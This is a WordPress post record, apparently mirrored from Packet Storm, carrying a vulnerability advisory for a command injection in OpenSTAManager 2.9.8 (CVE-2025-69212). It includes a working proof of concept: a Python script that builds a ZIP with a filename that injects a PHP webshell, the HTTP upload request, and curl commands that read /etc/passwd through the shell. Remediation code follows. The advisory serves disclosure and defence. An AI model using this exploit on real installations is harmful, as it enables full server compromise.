{"id":46316,"date":"2026-04-13T11:50:37","date_gmt":"2026-04-13T11:50:37","guid":{"rendered":"http:\/\/localhost\/?p=46316"},"modified":"2026-04-13T11:50:37","modified_gmt":"2026-04-13T11:50:37","slug":"openstamanager-298-command-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46316","title":{"rendered":"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:09&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218760&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69212&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-69212: OpenSTAManager has an OS Command Injection in P7M File Processing\\n    \\n    ## Overview\\n    \\n    | Field | Details |\\n    |&#8212;|&#8212;|\\n    | **CVE ID** | [CVE-2025-69212](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-69212) |\\n    | **Severity** | CRITICAL |\\n    | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-25fp-8w8p-mx36) |\\n    | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n    \\n    ## Affected Products\\n    \\n    &#8211; **devcode-it\/openstamanager** (versions: \\u003c= 2.9.8)\\n    \\n    \\n    ## CWE Classification\\n    \\n    &#8211; CWE-78: Improper Neutralization of Special Elements used in an OS Command (&#8216;OS Command Injection&#8217;)\\n    \\n    ## Details\\n    \\n    ## Summary\\n    A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\\n    \\n    \\n    ## Vulnerable Code\\n    **File:** `src\/Util\/XML.php:100`\\n    \\n    &#8220;`php\\n    public static function decodeP7M($file)\\n    {\\n        $directory = pathinfo($file, PATHINFO_DIRNAME);\\n        $content = file_get_contents($file);\\n    \\n        $output_file = $directory.&#8217;\/&#8217;.basename($file, &#8216;.p7m&#8217;);\\n    \\n        try {\\n            if (function_exists(&#8216;exec&#8217;)) {\\n                \/\/ VULNERABLE &#8211; No input sanitization!\\n                exec(&#8216;openssl smime -verify -noverify -in \\&#8221;&#8216;.$file.&#8217;\\&#8221; -inform DER -out \\&#8221;&#8216;.$output_file.&#8217;\\&#8221;&#8216;, $output, $cmd);\\n    &#8220;`\\n    \\n    **The Problem:**\\n    &#8211; The `$file` parameter is passed directly into `exec()` without sanitization\\n    &#8211; Although wrapped in double quotes, an attacker can escape them\\n    &#8211; The filename comes from uploaded ZIP archives (user-controlled)\\n    \\n    ## Attack Vector\\n    \\n    ### Entry Points:\\n    1. **plugins\/importFE_ZIP\/actions.php:126** (when automatic import is enabled)\\n       &#8220;`php\\n       foreach ($files_xml as $xml) {\\n           if (string_ends_with($xml, &#8216;.p7m&#8217;)) {\\n               $file = XML::decodeP7M($directory.&#8217;\/&#8217;.$xml);  \/\/ $xml from ZIP!\\n       &#8220;`\\n    \\n    2. **plugins\/importFE\/src\/FatturaElettronica.php:56** (constructor)\\n       &#8220;`php\\n       if (string_ends_with($name, &#8216;.p7m&#8217;)) {\\n           $file = XML::decodeP7M($this-\\u003efile);  \/\/ $name from user input!\\n       &#8220;`\\n    \\n    ### Attack Flow:\\n    1. Attacker creates ZIP with malicious filename\\n    2. Upload ZIP via importFE_ZIP plugin\\n    3. Application extracts ZIP and iterates files\\n    4. For `.p7m` files, `decodeP7M()` is called\\n    5. Malicious filename is injected into `exec()` command\\n    6. Arbitrary command executes as web server user\\n    \\n    ## Proof of Concept\\n    \\n    **\u26a0\ufe0f IMPORTANT NOTE:** PHP&#8217;s `ZipArchive::extractTo()` splits filenames on `\/` character. Payload must NOT contain `\/` in commands. Use `cd directory \\u0026\\u0026 command` instead of absolute paths.\\n    \\n    ### Step 1: Create Malicious ZIP\\n    \\n    &#8220;`python\\n    import zipfile\\n    \\n    cmd = \\&#8221;cd files \\u0026\\u0026 echo &#8216;\\u003c?php system($_GET[\\\\\\&#8221;c\\\\\\&#8221;]); ?\\u003e&#8217; \\u003e SHELL.php\\&#8221;\\n    malicious_filename = f&#8217;invoice.p7m\\&#8221;;{cmd};echo \\&#8221;.p7m&#8217;\\n    \\n    with zipfile.ZipFile(&#8216;exploit.zip&#8217;, &#8216;w&#8217;) as zf:\\n        zf.writestr(malicious_filename, b\\&#8221;DUMMY_P7M_CONTENT\\&#8221;)\\n    &#8220;`\\n    \\n    ### Step 2: Upload ZIP\\n    \\n    &#8220;`http\\n    POST \/actions.php HTTP\/1.1\\n    Host: localhost:8081\\n    Content-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundaryBKunENXxjEx5VrRc\\n    Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b\\n    \\n    &#8212;&#8212;WebKitFormBoundaryBKunENXxjEx5VrRc\\n    Content-Disposition: form-data; name=\\&#8221;blob1\\&#8221;; filename=\\&#8221;exploit.zip\\&#8221;\\n    Content-Type: application\/zip\\n    \\n    [ZIP CONTENT]\\n    &#8212;&#8212;WebKitFormBoundaryBKunENXxjEx5VrRc&#8211;\\n    Content-Disposition: form-data; name=\\&#8221;op\\&#8221;\\n    \\n    save\\n    \\n    &#8212;&#8212;WebKitFormBoundaryBKunENXxjEx5VrRc\\n    Content-Disposition: form-data; name=\\&#8221;id_module\\&#8221;\\n    \\n    14\\n    &#8212;&#8212;WebKitFormBoundaryBKunENXxjEx5VrRc\\n    Content-Disposition: form-data; name=\\&#8221;id_plugin\\&#8221;\\n    \\n    48\\n    &#8212;&#8212;WebKitFormBoundaryBKunENXxjEx5VrRc&#8211;\\n    &#8220;`\\n    \\u003cimg width=\\&#8221;2539\\&#8221; height=\\&#8221;809\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/f39cf6ad-9e8d-41de-866e-e01ec2064fd1\\&#8221; \/\\u003e\\n    \\n    \\u003cimg width=\\&#8221;1543\\&#8221; height=\\&#8221;659\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be\\&#8221; \/\\u003e\\n    \\n    ### Step 3: Exploitation Result\\n    \\n    **Response (500 error is expected &#8211; XML parsing fails AFTER command execution):**\\n    &#8220;`http\\n    HTTP\/1.1 500 Internal Server Error\\n    {\\&#8221;error\\&#8221;:{\\&#8221;type\\&#8221;:\\&#8221;Exception\\&#8221;,\\&#8221;message\\&#8221;:\\&#8221;Start tag expected, &#8216;\\u003c&#8217; not found\\&#8221;}}\\n    &#8220;`\\n    \\n    **Verification &#8211; Webshell Created:**\\n    \\n    \\u003cimg width=\\&#8221;1111\\&#8221; height=\\&#8221;239\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/d2e36cf3-c438-4509-be46-36d5c6f3e0d1\\&#8221; \/\\u003e\\n    \\n    ### Step 4: Remote Code Execution\\n    \\n    **Webshell is publicly accessible without authentication:**\\n    \\n    &#8220;`bash\\n    $ curl \\&#8221;http:\/\/localhost:8081\/files\/SHELL.php?c=id\\&#8221;\\n    uid=33(www-data) gid=33(www-data) groups=33(www-data)\\n    \\n    $ curl \\&#8221;http:\/\/localhost:8081\/files\/SHELL.php?c=cat+\/etc\/passwd\\&#8221;\\n    [Full \/etc\/passwd output]\\n    &#8220;`\\n    \\u003cimg width=\\&#8221;698\\&#8221; height=\\&#8221;475\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/7ee4630b-95a8-450c-bdce-d6f703c8168d\\&#8221; \/\\u003e\\n    \\n    \\n    ## Impact\\n    \\n    &#8211; **Remote Code Execution:** Full server compromise\\n    &#8211; **Data Exfiltration:** Access to all application data and database\\n    &#8211; **Privilege Escalation:** Potential escalation if web server runs with elevated privileges\\n    &#8211; **Persistence:** Install backdoors and maintain access\\n    &#8211; **Lateral Movement:** Pivot to other systems on the network\\n    \\n    ## Prerequisites\\n    \\n    &#8211; Authenticated user with access to invoice import functionality\\n    \\n    ## Remediation\\n    \\n    ###  Input Sanitization\\n    \\n    &#8220;`php\\n    public static function decodeP7M($file)\\n    {\\n        \/\/ Validate that file path doesn&#8217;t contain shell metacharacters\\n        if (preg_match(&#8216;\/[;\\u0026|`$(){}\\\\\\\\[\\\\\\\\]\\u003c\\u003e]\/&#8217;, $file)) {\\n            throw new \\\\Exception(&#8216;Invalid file path&#8217;);\\n        }\\n    \\n        \/\/ Better: use escapeshellarg()\\n        $safe_file = escapeshellarg($file);\\n        $safe_output = escapeshellarg($output_file);\\n    \\n        exec(\\&#8221;openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output\\&#8221;, $output, $cmd);\\n    }\\n    &#8220;`\\n    or\\n    \\n    ### Validate Filename Before Processing\\n    \\n    &#8220;`php\\n    \/\/ In the upload handler, validate filenames from ZIP\\n    foreach ($files_xml as $xml) {\\n        \/\/ Only allow alphanumeric, dots, dashes, underscores\\n        if (!preg_match(&#8216;\/^[a-zA-Z0-9._-]+$\/&#8217;, $xml)) {\\n            continue; \/\/ Skip invalid filenames\\n        }\\n    \\n        if (string_ends_with($xml, &#8216;.p7m&#8217;)) {\\n            $file = XML::decodeP7M($directory.&#8217;\/&#8217;.$xml);\\n        }\\n    }\\n    &#8220;`\\n    \\n    \\n    ## Credit\\n    Discovered by: \u0141ukasz Rybak\\n    \\n    ## References\\n    \\n    &#8211; https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-25fp-8w8p-mx36\\n    &#8211; https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-69212\\n    &#8211; https:\/\/github.com\/advisories\/GHSA-25fp-8w8p-mx36\\n    \\n    \\n    ## Disclaimer\\n    \\n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218760&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.4,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218760\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:09&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218760&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69212&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-69212: OpenSTAManager has an&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-46316","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46316\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:09&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218760&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69212&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-69212: OpenSTAManager has an...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46316\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46316#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46316\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760\",\"datePublished\":\"2026-04-13T11:50:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46316\"},\"wordCount\":1194,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.4\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46316#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46316\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46316\",\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46316#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46316\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46316#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46316","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:48:09&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218760&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69212&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2025-69212: OpenSTAManager has an...","og_url":"https:\/\/zero.redgem.net\/?p=46316","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46316#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46316"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760","datePublished":"2026-04-13T11:50:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46316"},"wordCount":1194,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.4","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46316#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46316","url":"https:\/\/zero.redgem.net\/?p=46316","name":"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46316#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46316"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46316#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection_PACKETSTORM:218760"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46316"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46316\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}